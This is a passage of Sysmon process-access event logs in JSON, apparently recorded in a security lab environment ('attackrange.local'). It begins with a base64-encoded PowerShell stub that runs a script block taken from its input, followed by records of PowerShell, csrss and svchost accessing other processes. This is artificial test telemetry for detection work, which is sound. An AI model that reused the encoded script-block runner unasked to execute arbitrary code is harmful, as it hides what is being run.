JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nSourceProcessId: 3396\r\nSourceThreadId: 4784\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-001080B20700}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98582f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+979e485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a42d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a181a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a246db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a242ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0a0f9(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","SourceProcessId":"3396","SourceThreadId":"4784","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-001080B20700}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98582f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+979e485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a42d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a26223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a181a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a246db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a242ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a23cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+984d50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97a0a0f9(wow64)","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-001080B20700}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-001080B20700}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 